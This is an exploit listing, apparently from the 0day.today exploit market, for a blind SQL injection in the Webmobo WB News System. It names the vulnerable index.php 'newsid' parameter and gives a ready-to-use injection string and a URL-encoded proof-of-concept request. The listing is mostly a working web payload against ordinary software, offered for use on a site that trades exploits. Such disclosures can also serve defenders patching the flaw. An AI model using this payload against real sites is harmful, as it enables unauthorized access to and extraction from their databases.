[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webmobo WB News System Blind SQL Injection

Author
Eyup CELIK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16905
Category
web applications
Date add
04-09-2011
Platform
php
# Exploit Title: Webmobo News System Blind SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
 
 
ISSUE
 
Blind SQL Injection can be done using the command input
 
Vulnerable Page:
index.php
 
Example:
index.php?action=sendto&newsid=<Blind SQL Injection Code>
 
Exploit:
index.php?action=sendto&newsid=1' and '2'='2
 
POC:
http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272



#  0day.today [2024-11-14]  #